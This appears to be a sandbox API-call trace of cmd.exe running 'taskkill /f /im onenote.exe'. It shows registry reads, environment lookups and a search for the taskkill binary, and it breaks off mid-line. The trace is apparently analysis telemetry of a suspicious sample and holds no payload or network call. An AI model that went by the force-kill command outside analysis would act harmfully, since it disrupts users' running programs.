GetProcessHeap () returned 0x590000 [0060.527] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4) returned 0x5a0c78 [0060.527] GetEnvironmentStringsW () returned 0x5a2040* [0060.527] GetProcessHeap () returned 0x590000 [0060.527] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a35f0 [0060.527] FreeEnvironmentStringsW (penv=0x5a2040) returned 1 [0060.527] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ebe0 | out: phkResult=0x18ebe0*=0x68) returned 0x0 [0060.527] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x0, lpData=0x18ebec*=0x0, lpcbData=0x18ebe4*=0x1000) returned 0x2 [0060.527] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x4, lpData=0x18ebec*=0x1, lpcbData=0x18ebe4*=0x4) returned 0x0 [0060.527] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x0, lpData=0x18ebec*=0x1, lpcbData=0x18ebe4*=0x1000) returned 0x2 [0060.527] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x4, lpData=0x18ebec*=0x0, lpcbData=0x18ebe4*=0x4) returned 0x0 [0060.527] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x4, lpData=0x18ebec*=0x40, lpcbData=0x18ebe4*=0x4) returned 0x0 [0060.527] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x4, lpData=0x18ebec*=0x40, lpcbData=0x18ebe4*=0x4) returned 0x0 [0060.527] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x0, lpData=0x18ebec*=0x40, lpcbData=0x18ebe4*=0x1000) returned 0x2 [0060.527] RegCloseKey (hKey=0x68) returned 0x0 [0060.527] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ebe0 | out: phkResult=0x18ebe0*=0x68) returned 0x0 [0060.527] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x0, lpData=0x18ebec*=0x40, lpcbData=0x18ebe4*=0x1000) returned 0x2 [0060.527] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x4, lpData=0x18ebec*=0x1, lpcbData=0x18ebe4*=0x4) returned 0x0 [0060.528] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x0, lpData=0x18ebec*=0x1, lpcbData=0x18ebe4*=0x1000) returned 0x2 [0060.528] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x4, lpData=0x18ebec*=0x0, lpcbData=0x18ebe4*=0x4) returned 0x0 [0060.528] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x4, lpData=0x18ebec*=0x9, lpcbData=0x18ebe4*=0x4) returned 0x0 [0060.528] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x4, lpData=0x18ebec*=0x9, lpcbData=0x18ebe4*=0x4) returned 0x0 [0060.528] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ebe8, lpData=0x18ebec, lpcbData=0x18ebe4*=0x1000 | out: lpType=0x18ebe8*=0x0, lpData=0x18ebec*=0x9, lpcbData=0x18ebe4*=0x1000) returned 0x2 [0060.528] RegCloseKey (hKey=0x68) returned 0x0 [0060.528] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebad [0060.528] srand (_Seed=0x5d97ebad) [0060.528] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im onenote.exe" [0060.528] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im onenote.exe" [0060.528] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.528] GetProcessHeap () returned 0x590000 [0060.528] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a2040 [0060.530] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a2048, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0060.530] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.530] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.530] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.530] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0060.530] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0060.530] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0060.530] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0060.530] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0060.530] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0060.530] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0060.530] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0060.530] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0060.530] GetProcessHeap () returned 0x590000 [0060.530] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a2b18 | out: hHeap=0x590000) returned 1 [0060.530] GetEnvironmentStringsW () returned 0x5a2258* [0060.530] GetProcessHeap () returned 0x590000 [0060.530] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xae2) returned 0x5a4bb8 [0060.530] FreeEnvironmentStringsW (penv=0x5a2258) returned 1 [0060.530] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0060.530] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.531] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0060.531] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0060.531] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0060.531] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0060.531] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0060.531] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0060.531] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0060.531] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0060.531] GetProcessHeap () returned 0x590000 [0060.531] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a56a8 [0060.531] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f9ac | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.531] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x18f9ac, lpFilePart=0x18f9a8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f9a8*="Desktop") returned 0x25 [0060.531] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.531] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f728 | out: lpFindFileData=0x18f728*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5a1ec0 [0060.531] FindClose (in: hFindFile=0x5a1ec0 | out: hFindFile=0x5a1ec0) returned 1 [0060.531] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x18f728 | out: lpFindFileData=0x18f728*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5a1ec0 [0060.531] FindClose (in: hFindFile=0x5a1ec0 | out: hFindFile=0x5a1ec0) returned 1 [0060.531] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0060.531] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x18f728 | out: lpFindFileData=0x18f728*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5a1ec0 [0060.532] FindClose (in: hFindFile=0x5a1ec0 | out: hFindFile=0x5a1ec0) returned 1 [0060.532] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.532] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0060.532] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0060.532] GetProcessHeap () returned 0x590000 [0060.532] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4bb8 | out: hHeap=0x590000) returned 1 [0060.532] GetEnvironmentStringsW () returned 0x5a40c8* [0060.532] GetProcessHeap () returned 0x590000 [0060.532] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a5f08 [0060.532] FreeEnvironmentStringsW (penv=0x5a40c8) returned 1 [0060.532] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.532] GetProcessHeap () returned 0x590000 [0060.532] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a56a8 | out: hHeap=0x590000) returned 1 [0060.532] GetProcessHeap () returned 0x590000 [0060.532] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400e) returned 0x5a6a48 [0060.532] GetProcessHeap () returned 0x590000 [0060.533] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x44) returned 0x5a1ec0 [0060.533] GetProcessHeap () returned 0x590000 [0060.533] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6a48 | out: hHeap=0x590000) returned 1 [0060.533] GetConsoleOutputCP () returned 0x1b5 [0060.750] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.750] GetUserDefaultLCID () returned 0x409 [0060.750] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18faec, cchData=128 | out: lpLCData="0") returned 2 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18faec, cchData=128 | out: lpLCData="0") returned 2 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18faec, cchData=128 | out: lpLCData="1") returned 2 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0060.751] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0060.751] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0060.752] GetProcessHeap () returned 0x590000 [0060.752] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20c) returned 0x5a2dd0 [0060.752] GetConsoleTitleW (in: lpConsoleTitle=0x5a2dd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.753] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.753] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0060.753] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0060.753] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0060.753] GetProcessHeap () returned 0x590000 [0060.753] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5a6a48 [0060.753] GetProcessHeap () returned 0x590000 [0060.753] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6a48 | out: hHeap=0x590000) returned 1 [0060.754] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0060.754] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0060.754] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0060.754] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0060.754] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0060.754] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0060.754] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0060.754] GetProcessHeap () returned 0x590000 [0060.754] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a2fe8 [0060.754] GetProcessHeap () returned 0x590000 [0060.754] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x5a5748 [0060.754] GetProcessHeap () returned 0x590000 [0060.754] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5a3048 [0060.755] GetConsoleTitleW (in: lpConsoleTitle=0x18f7e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.755] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.756] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.756] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.756] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.756] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.756] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.756] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.756] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.756] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.756] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.756] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.756] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.756] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.756] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.756] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.756] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.756] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.756] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.756] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.756] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.756] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.756] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.756] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.756] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.756] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.756] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.756] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.756] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.756] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.756] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.756] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.756] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.756] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.756] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.756] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.756] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.756] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.756] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.757] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.757] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.757] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.757] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.757] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.757] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.757] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.757] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.757] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.757] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.757] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.757] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.757] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.757] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.757] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.757] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.757] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.757] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.757] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.757] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.757] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.757] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.757] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.757] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.757] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.757] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.757] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.757] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.757] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.757] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.757] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.757] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.757] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.757] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.758] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.758] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.758] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.758] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.758] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.758] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.758] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.758] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.758] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.758] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.758] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.758] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.758] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0060.758] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0060.758] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0060.758] GetProcessHeap () returned 0x590000 [0060.758] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a3080 [0060.758] GetProcessHeap () returned 0x590000 [0060.758] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x42) returned 0x5a3298 [0060.758] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0060.759] GetProcessHeap () returned 0x590000 [0060.759] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x418) returned 0x5907f0 [0060.759] SetErrorMode (uMode=0x0) returned 0x0 [0060.759] SetErrorMode (uMode=0x1) returned 0x0 [0060.759] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5907f8, lpFilePart=0x18f304 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f304*="Desktop") returned 0x25 [0060.759] SetErrorMode (uMode=0x0) returned 0x1 [0060.759] GetProcessHeap () returned 0x590000 [0060.759] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5907f0, Size=0x66) returned 0x5907f0 [0060.759] GetProcessHeap () returned 0x590000 [0060.759] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5907f0) returned 0x66 [0060.759] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.759] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0060.759] GetProcessHeap () returned 0x590000 [0060.759] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x120) returned 0x5a32e8 [0060.759] GetProcessHeap () returned 0x590000 [0060.759] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x238) returned 0x590860 [0060.765] GetProcessHeap () returned 0x590000 [0060.765] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x590860, Size=0x122) returned 0x590860 [0060.765] GetProcessHeap () returned 0x590000 [0060.765] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x590860) returned 0x122 [0060.765] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.765] GetProcessHeap () returned 0x590000 [0060.765] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe0) returned 0x5a3410 [0060.765] GetProcessHeap () returned 0x590000 [0060.765] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a3410, Size=0x76) returned 0x5a3410 [0060.765] GetProcessHeap () returned 0x590000 [0060.766] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a3410) returned 0x76 [0060.766] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.766] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x18f080, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f080) returned 0xffffffff [0060.766] GetLastError () returned 0x2 [0060.766] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill", fInfoLevelId=0x1, lpFindFileData=0x18f080, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f080) returned 0xffffffff [0060.767] GetLastError () returned 0x2 [0060.767] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.767] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x18f080, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f080) returned 0x5a3490 [0060.767] GetProcessHeap () returned 0x590000 [0060.767] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5a34d0 [0060.767] FindClose (in: hFindFile=0x5a3490 | out: hFindFile=0x5a3490) returned 1 [0060.767] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x18f080, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f080) returned 0xffffffff [0060.767] GetLastError () returned 